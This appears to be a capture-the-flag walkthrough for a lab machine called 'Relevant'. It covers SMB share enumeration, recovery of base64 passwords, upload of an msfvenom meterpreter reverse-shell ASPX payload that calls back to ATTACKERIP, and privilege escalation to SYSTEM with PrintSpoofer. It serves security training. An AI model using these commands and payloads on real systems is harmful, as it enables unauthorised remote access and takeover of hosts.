Relevant

Tasks:

  1. Pre-Engagement Briefing:

    1. Do usual nmap scan with service scanning - smb running on 445, IIS Server on 80,49663
    2. Connect to smb and enumerate shares - nt4wrksv seems unique and contains passwords.txt get that, the passwords are base64 encoded , decode them and save them for future use.
    3. Scan with gobuster for directories in port 80,49664 with directory-list-2.3-medium.txt wordlist, you will find nt4wrksv directory in 49664 , try opening http://ip:49664/nt4wrksv/passwords.txt in browser you can see same file as in smb share. - This directory is somehow hosting files from smb share.
    4. Create msfvenom payload msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=ATTACKERIP lport=1234 -f aspx -o shell.aspx and upload to smbshare ,Now start meterpreter listener use exploit/multi/handler and set payload windows/x64/meterpreter_reverse_tcp, configure LHOST and LPORT and run,and also open http://ip:49664/nt4wrksv/shell.aspx in browser - You now have shell !!!.
    5. Type shell in meterpreter to get cmd, Go to bob Desktop and type user.txt , then submit the user flag
    6. Type whoami /priv - SeImpersonatePrivilege enabled !!!
    7. Use systeminfo to get windows version and details traditional juicy potato won't work here , So we need to use something called PrintSpoofer or direct binary link, upload PrintSpoofer.exe to smb share , again go to windows shell in meterpreter cd C:\inetpub\wwwroot\nt4wrksv , run PrintSpoofer -i -c "cmd" to get root shell.
    8. Go to Administrator's Desktop and type root.txt to get root flag and submit.

References:

  1. https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/

results matching ""

    No results matching ""